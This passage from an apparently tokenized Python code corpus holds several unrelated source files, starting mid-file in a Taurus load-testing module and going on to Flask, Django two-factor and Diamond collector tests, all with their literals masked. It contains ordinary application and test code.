write ( type_and_delay + payload_len_bytes + payload_offset_bytes ) <EOL> if pbar : <EOL> pbar . increment ( ) <EOL> cnt += <NUM_LIT:1> <EOL> prev_offset = time_offset <EOL> self . log . debug ( "<STR_LIT>" , cnt ) <EOL> if pbar : <EOL> pbar . finish ( ) <EOL> def _get_source ( self , load ) : <EOL> tpl = '<STR_LIT>' <EOL> if load . duration : <EOL> duration_limit = "<STR_LIT>" % int ( load . duration ) <EOL> else : <EOL> duration_limit = "<STR_LIT>" <EOL> return tpl % ( self . payload_file , self . schedule_file , duration_limit ) <EOL> def _get_additional_modules ( self ) : <EOL> res = super ( TaurusPBenchTool , self ) . _get_additional_modules ( ) <EOL> res += '<STR_LIT>' % self . modules_path <EOL> return res <EOL> class Scheduler ( object ) : <EOL> REC_TYPE_SCHEDULE = <NUM_LIT:0> <EOL> REC_TYPE_LOOP_START = <NUM_LIT:1> <EOL> REC_TYPE_STOP = <NUM_LIT:2> <EOL> def __init__ ( self , load , payload_fhd , logger ) : <EOL> super ( Scheduler , self ) . __init__ ( ) <EOL> self . need_start_loop = None <EOL> self . log = logger <EOL> self . load = load <EOL> self . payload_fhd = payload_fhd <EOL> if not load . duration and not load . iterations : <EOL> self . iteration_limit = <NUM_LIT:1> <EOL> else : <EOL> self . iteration_limit = load . iterations <EOL> self . concurrency = load . concurrency if load . concurrency is not None else <NUM_LIT:1> <EOL> self . step_len = load . ramp_up / load . steps if load . steps and load . ramp_up else <NUM_LIT:0> <EOL> if load . throughput : <EOL> self . ramp_up_slope = load . throughput / load . ramp_up if load . ramp_up else <NUM_LIT:0> <EOL> self . step_size = float ( load . throughput ) / load . steps if load . steps else <NUM_LIT:0> <EOL> else : <EOL> self . ramp_up_slope = None <EOL> self . step_size = float ( self . concurrency ) / load . steps if load . steps else <NUM_LIT:0> <EOL> self . count = <NUM_LIT:0.0> <EOL> self . time_offset = <NUM_LIT:0.0> <EOL> self . iterations = <NUM_LIT:0> <EOL> def _payload_reader ( self ) : <EOL> self . iterations = <NUM_LIT:1> <EOL> rec_type = self . REC_TYPE_SCHEDULE <EOL> while True : <EOL> payload_offset = self . payload_fhd . tell ( ) <EOL> line = self . payload_fhd . readline ( ) <EOL> if not line : <EOL> self . payload_fhd . seek ( <NUM_LIT:0> ) <EOL> self . iterations += <NUM_LIT:1> <EOL> if self . need_start_loop is not None and self . need_start_loop and not self . iteration_limit : <EOL> self . need_start_loop = False <EOL> self . iteration_limit = self . iterations <EOL> rec_type = self . REC_TYPE_LOOP_START <EOL> if self . iteration_limit and self . iterations > self . iteration_limit : <EOL> self . log . debug ( "<STR_LIT>" , self . iteration_limit ) <EOL> break <EOL> continue <EOL> if not line . strip ( ) : <EOL> continue <EOL> parts = line . split ( b ( '<STR_LIT:U+0020>' ) ) <EOL> if len ( parts ) < <NUM_LIT:2> : <EOL> raise RuntimeError ( "<STR_LIT>" , line ) <EOL> payload_len , marker = parts <EOL> marker = marker . decode ( ) <EOL> payload_len = int ( payload_len ) <EOL> payload = self . payload_fhd . read ( payload_len ) . decode ( ) <EOL> yield payload_len , payload_offset , payload , marker . strip ( ) , len ( line ) , rec_type <EOL> rec_type = self . REC_TYPE_SCHEDULE <EOL> def generate ( self ) : <EOL> for payload_len , payload_offset , payload , marker , meta_len , record_type in self . _payload_reader ( ) : <EOL> if self . load . throughput : <EOL> self . time_offset += self . __get_time_offset_rps ( ) <EOL> if self . time_offset > self . load . duration : <EOL> self . log . debug ( "<STR_LIT>" , self . time_offset ) <EOL> break <EOL> else : <EOL> self . time_offset = self . __get_time_offset_concurrency ( ) <EOL> overall_len = payload_len + meta_len <EOL> yield self . time_offset , payload_len , payload_offset , payload , marker , record_type , overall_len <EOL> self . count += <NUM_LIT:1> <EOL> def __get_time_offset_concurrency ( self ) : <EOL> if not self . load . ramp_up or self . count >= self . concurrency : <EOL> if self . need_start_loop is None : <EOL> self . need_start_loop = True <EOL> return - <NUM_LIT:1> <EOL> elif self . load . steps : <EOL> step = math . floor ( self . count / self . step_size ) <EOL> return step * self . step_len <EOL> else : <EOL> return self . count * self . load . ramp_up / self . concurrency <EOL> def __get_time_offset_rps ( self ) : <EOL> if not self . load . ramp_up or self . time_offset > self . load . ramp_up : <EOL> rps = self . load . throughput <EOL> if self . need_start_loop is None : <EOL> self . need_start_loop = True <EOL> elif self . load . steps : <EOL> rps = self . step_size * ( math . floor ( self . time_offset / self . step_len ) + <NUM_LIT:1> ) <EOL> else : <EOL> xpos = math . sqrt ( <NUM_LIT:2> * self . count / self . ramp_up_slope ) <EOL> rps = xpos * self . ramp_up_slope <EOL> return <NUM_LIT:1.0> / rps if rps else <NUM_LIT:0> <EOL> class PBenchKPIReader ( ResultsReader ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filename , parent_logger , stats_filename ) : <EOL> super ( PBenchKPIReader , self ) . __init__ ( ) <EOL> self . log = parent_logger . getChild ( self . __class__ . __name__ ) <EOL> self . filename = filename <EOL> self . csvreader = None <EOL> self . offset = <NUM_LIT:0> <EOL> self . fds = None <EOL> if stats_filename : <EOL> self . stats_reader = PBenchStatsReader ( stats_filename , parent_logger ) <EOL> else : <EOL> self . stats_reader = None <EOL> def _read ( self , last_pass = False ) : <EOL> """<STR_LIT>""" <EOL> def mcs2sec ( val ) : <EOL> return int ( int ( val ) / <NUM_LIT> ) / <NUM_LIT> <EOL> if self . stats_reader : <EOL> self . stats_reader . read_file ( last_pass ) <EOL> if not self . csvreader and not self . __open_fds ( ) : <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> return <EOL> self . log . debug ( "<STR_LIT>" , self . filename ) <EOL> self . fds . seek ( self . offset ) <EOL> for row in self . csvreader : <EOL> label = row [ "<STR_LIT:label>" ] <EOL> rtm = mcs2sec ( row [ "<STR_LIT>" ] ) <EOL> ltc = mcs2sec ( row [ "<STR_LIT>" ] ) <EOL> cnn = mcs2sec ( row [ "<STR_LIT>" ] ) <EOL> if row [ "<STR_LIT>" ] != "<STR_LIT:0>" : <EOL> error = strerror ( int ( row [ "<STR_LIT>" ] ) ) <EOL> rcd = error <EOL> else : <EOL> error = None <EOL> rcd = row [ "<STR_LIT>" ] <EOL> tstmp = int ( float ( row [ "<STR_LIT>" ] ) + rtm ) <EOL> concur = <NUM_LIT:0> <EOL> yield tstmp , label , concur , rtm , cnn , ltc , rcd , error , '<STR_LIT>' <EOL> self . offset = self . fds . tell ( ) <EOL> def _calculate_datapoints ( self , final_pass = False ) : <EOL> for point in super ( PBenchKPIReader , self ) . _calculate_datapoints ( final_pass ) : <EOL> if self . stats_reader : <EOL> concurrency = self . stats_reader . get_data ( point [ DataPoint . TIMESTAMP ] ) <EOL> else : <EOL> concurrency = <NUM_LIT:0> <EOL> for label_data in viewvalues ( point [ DataPoint . CURRENT ] ) : <EOL> label_data [ KPISet . CONCURRENCY ] = concurrency <EOL> yield point <EOL> def __open_fds ( self ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isfile ( self . filename ) : <EOL> self . log . debug ( "<STR_LIT>" , self . filename ) <EOL> return False <EOL> fsize = os . path . getsize ( self . filename ) <EOL> if not fsize : <EOL> self . log . debug ( "<STR_LIT>" , self . filename ) <EOL> return False <EOL> self . log . debug ( "<STR_LIT>" , self . filename ) <EOL> self . fds = open ( self . filename ) <EOL> fields = ( "<STR_LIT>" , "<STR_LIT:label>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> dialect = csv . excel_tab ( ) <EOL> self . csvreader = csv . DictReader ( self . fds , fields , dialect = dialect ) <EOL> return True <EOL> def __del__ ( self ) : <EOL> if self . fds : <EOL> self . fds . close ( ) <EOL> class PBenchStatsReader ( object ) : <EOL> MARKER = "<STR_LIT>" <EOL> def __init__ ( self , filename , parent_logger ) : <EOL> super ( PBenchStatsReader , self ) . __init__ ( ) <EOL> self . log = parent_logger . getChild ( self . __class__ . __name__ ) <EOL> self . filename = filename <EOL> self . buffer = '<STR_LIT>' <EOL> self . fds = None <EOL> self . data = { } <EOL> def read_file ( self , last_pass = False ) : <EOL> if not os . path . isfile ( self . filename ) : <EOL> self . log . debug ( "<STR_LIT>" , self . filename ) <EOL> return False <EOL> if not self . fds : <EOL> self . log . debug ( "<STR_LIT>" , self . filename ) <EOL> self . fds = open ( self . filename ) <EOL> self . buffer += self . fds . read ( ) <EOL> while self . MARKER in self . buffer : <EOL> idx = self . buffer . find ( self . MARKER ) + len ( self . MARKER ) <EOL> chunk_str = self . buffer [ : idx - <NUM_LIT:1> ] <EOL> self . buffer = self . buffer [ idx + + <NUM_LIT:1> : ] <EOL> chunk = json . loads ( "<STR_LIT>" % chunk_str ) <EOL> for date_str in chunk . keys ( ) : <EOL> statistics = chunk [ date_str ] <EOL> date_obj = datetime . datetime . strptime ( date_str . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> date = int ( time . mktime ( date_obj . timetuple ( ) ) ) <EOL> self . data [ date ] = <NUM_LIT:0> <EOL> for benchmark_name in statistics . keys ( ) : <EOL> if not benchmark_name . startswith ( "<STR_LIT>" ) : <EOL> continue <EOL> benchmark = statistics [ benchmark_name ] <EOL> for method in benchmark : <EOL> meth_obj = benchmark [ method ] <EOL> if "<STR_LIT>" in meth_obj : <EOL> self . data [ date ] += meth_obj [ "<STR_LIT>" ] [ <NUM_LIT:2> ] <EOL> self . log . debug ( "<STR_LIT>" , date , self . data [ date ] ) <EOL> def get_data ( self , tstmp ) : <EOL> if tstmp in self . data : <EOL> return self . data [ tstmp ] <EOL> else : <EOL> self . log . debug ( "<STR_LIT>" , tstmp ) <EOL> return <NUM_LIT:0> <EOL> def __del__ ( self ) : <EOL> if self . fds : <EOL> self . fds . close ( ) <EOL> class PBench ( RequiredTool ) : <EOL> def __init__ ( self , parent_logger , tool_path ) : <EOL> super ( PBench , self ) . __init__ ( "<STR_LIT>" , tool_path ) <EOL> self . log = parent_logger . getChild ( self . __class__ . __name__ ) <EOL> def check_if_installed ( self ) : <EOL> self . log . debug ( "<STR_LIT>" , self . tool_path ) <EOL> try : <EOL> pbench = shell_exec ( [ self . tool_path ] , stderr = subprocess . STDOUT ) <EOL> pbench_out , pbench_err = pbench . communicate ( ) <EOL> self . log . debug ( "<STR_LIT>" , pbench_out ) <EOL> if pbench_err : <EOL> self . log . warning ( "<STR_LIT>" , pbench_err ) <EOL> return True <EOL> except ( CalledProcessError , OSError ) : <EOL> self . log . debug ( "<STR_LIT>" , traceback . format_exc ( ) ) <EOL> self . log . error ( "<STR_LIT>" ) <EOL> return False <EOL> def install ( self ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) </s>
<s> import sys <EOL> import os <EOL> import subprocess <EOL> def callBlender ( filename ) : <EOL> blenderFilename = "<STR_LIT>" <EOL> blendFilename = os . path . join ( os . path . dirname ( os . path . realpath ( __file__ ) ) , "<STR_LIT>" ) <EOL> command = [ blenderFilename , "<STR_LIT>" , blendFilename , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , filename ] <EOL> proc = subprocess . Popen ( command ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> for n in sys . argv [ <NUM_LIT:1> : ] : <EOL> callBlender ( n ) <EOL> raw_input ( ) </s>
<s> from flask import Flask , url_for <EOL> from flaskext . odesk import odesk <EOL> from mock import patch <EOL> import unittest <EOL> class ODeskTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> app = Flask ( __name__ ) <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app . register_module ( odesk , url_prefix = '<STR_LIT>' ) <EOL> ctx = app . test_request_context ( ) <EOL> ctx . push ( ) <EOL> self . app = app <EOL> self . tc = self . app . test_client ( ) <EOL> def test_url_for ( self ) : <EOL> assert url_for ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert url_for ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert url_for ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_login_required ( self ) : <EOL> def patched_httplib2_request ( * args , ** kwargs ) : <EOL> return { '<STR_LIT:status>' : '<STR_LIT>' } , '<STR_LIT>' <EOL> def patched_httplib2_access ( * args , ** kwargs ) : <EOL> return { '<STR_LIT:status>' : '<STR_LIT>' } , '<STR_LIT>' <EOL> def patched_get_authorize_url ( * args , ** kwargs ) : <EOL> return url_for ( '<STR_LIT>' , next = '<STR_LIT>' , oauth_verifier = '<STR_LIT>' ) <EOL> @ self . app . route ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' , patched_httplib2_request ) <EOL> @ patch ( '<STR_LIT>' , patched_get_authorize_url ) <EOL> @ patch ( '<STR_LIT>' , patched_httplib2_access ) <EOL> @ odesk . login_required <EOL> def admin ( ) : <EOL> self . odesk_is_authorized = odesk . is_authorized ( ) <EOL> self . odesk_access_token = odesk . get_access_token ( ) <EOL> odesk . logout ( ) <EOL> self . odesk_is_not_authorized = odesk . is_authorized ( ) <EOL> return "<STR_LIT>" <EOL> response = self . tc . get ( '<STR_LIT>' , follow_redirects = True ) <EOL> assert "<STR_LIT>" in response . data <EOL> assert self . odesk_is_authorized == True <EOL> assert self . odesk_access_token == ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert self . odesk_is_not_authorized == False <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import os <EOL> from django . core . urlresolvers import reverse_lazy <EOL> try : <EOL> import otp_yubikey <EOL> except ImportError : <EOL> otp_yubikey = None <EOL> BASE_DIR = os . path . dirname ( __file__ ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> INSTALLED_APPS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> if otp_yubikey : <EOL> INSTALLED_APPS += [ '<STR_LIT>' ] <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> LOGOUT_URL = reverse_lazy ( '<STR_LIT>' ) <EOL> LOGIN_URL = reverse_lazy ( '<STR_LIT>' ) <EOL> LOGIN_REDIRECT_URL = reverse_lazy ( '<STR_LIT>' ) <EOL> CACHES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> TEMPLATE_DIRS = ( <EOL> os . path . join ( BASE_DIR , '<STR_LIT>' ) , <EOL> ) <EOL> TEMPLATES = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> os . path . join ( BASE_DIR , '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> } , <EOL> ] <EOL> TWO_FACTOR_PATCH_ADMIN = False <EOL> AUTH_USER_MODEL = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from django . conf . urls import url <EOL> from two_factor . views import ( LoginView , <EOL> PhoneDeleteView , PhoneSetupView , DisableView , <EOL> BackupTokensView , SetupCompleteView , SetupView , <EOL> ProfileView , QRGeneratorView ) <EOL> core = [ <EOL> url ( <EOL> regex = r'<STR_LIT>' , <EOL> view = LoginView . as_view ( ) , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> url ( <EOL> regex = r'<STR_LIT>' , <EOL> view = SetupView . as_view ( ) , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> url ( <EOL> regex = r'<STR_LIT>' , <EOL> view = QRGeneratorView . as_view ( ) , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> url ( <EOL> regex = r'<STR_LIT>' , <EOL> view = SetupCompleteView . as_view ( ) , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> url ( <EOL> regex = r'<STR_LIT>' , <EOL> view = BackupTokensView . as_view ( ) , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> url ( <EOL> regex = r'<STR_LIT>' , <EOL> view = PhoneSetupView . as_view ( ) , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> url ( <EOL> regex = r'<STR_LIT>' , <EOL> view = PhoneDeleteView . as_view ( ) , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> ] <EOL> profile = [ <EOL> url ( <EOL> regex = r'<STR_LIT>' , <EOL> view = ProfileView . as_view ( ) , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> url ( <EOL> regex = r'<STR_LIT>' , <EOL> view = DisableView . as_view ( ) , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> ] <EOL> urlpatterns = core + profile </s>
<s> from django . conf . urls import url <EOL> from user_sessions . views import SessionDeleteOtherView <EOL> from . views import SessionListView , SessionDeleteView <EOL> urlpatterns = [ <EOL> url ( <EOL> regex = r'<STR_LIT>' , <EOL> view = SessionListView . as_view ( ) , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> url ( <EOL> regex = r'<STR_LIT>' , <EOL> view = SessionDeleteOtherView . as_view ( ) , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> url ( <EOL> regex = r'<STR_LIT>' , <EOL> view = SessionDeleteView . as_view ( ) , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> ] </s>
<s> from setuptools import setup <EOL> DESCRIPTION = "<STR_LIT>" <EOL> LONG_DESCRIPTION = None <EOL> try : <EOL> LONG_DESCRIPTION = open ( '<STR_LIT>' ) . read ( ) <EOL> except : <EOL> pass <EOL> CLASSIFIERS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = DESCRIPTION , <EOL> long_description = LONG_DESCRIPTION , <EOL> platforms = [ '<STR_LIT>' ] , <EOL> classifiers = CLASSIFIERS , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import unittest <EOL> from mock import Mock <EOL> from mock import patch <EOL> from diamond . collector import Collector <EOL> from bind import BindCollector <EOL> class TestBindCollector ( CollectorTestCase ) : <EOL> def setUp ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> } ) <EOL> self . collector = BindCollector ( config , None ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( BindCollector ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_real_data ( self , publish_mock ) : <EOL> patch_urlopen = patch ( '<STR_LIT>' , Mock ( <EOL> return_value = self . getFixture ( '<STR_LIT>' ) ) ) <EOL> patch_urlopen . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_urlopen . stop ( ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> self . setDocExample ( collector = self . collector . __class__ . __name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import unittest <EOL> from mock import Mock <EOL> from mock import patch <EOL> from diamond . collector import Collector <EOL> from elasticsearch import ElasticSearchCollector <EOL> class TestElasticSearchCollector ( CollectorTestCase ) : <EOL> def setUp ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { } ) <EOL> self . collector = ElasticSearchCollector ( config , None ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( ElasticSearchCollector ) <EOL> def test_new__instances_default ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { } ) <EOL> self . collector = ElasticSearchCollector ( config , None ) <EOL> self . assertEqual ( self . collector . instances , { '<STR_LIT>' : ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) } ) <EOL> def test_new__instances_single ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . collector = ElasticSearchCollector ( config , None ) <EOL> self . assertEqual ( self . collector . instances , { '<STR_LIT:default>' : ( '<STR_LIT>' , <NUM_LIT> ) } ) <EOL> def test_new__instances_multi ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] } ) <EOL> self . collector = ElasticSearchCollector ( config , None ) <EOL> self . assertEqual ( self . collector . instances , { <EOL> '<STR_LIT:default>' : ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> '<STR_LIT:foo>' : ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> '<STR_LIT:bar>' : ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> } ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_real_data ( self , publish_mock ) : <EOL> returns = [ <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> ] <EOL> urlopen_mock = patch ( '<STR_LIT>' , Mock ( <EOL> side_effect = lambda * args : returns . pop ( <NUM_LIT:0> ) 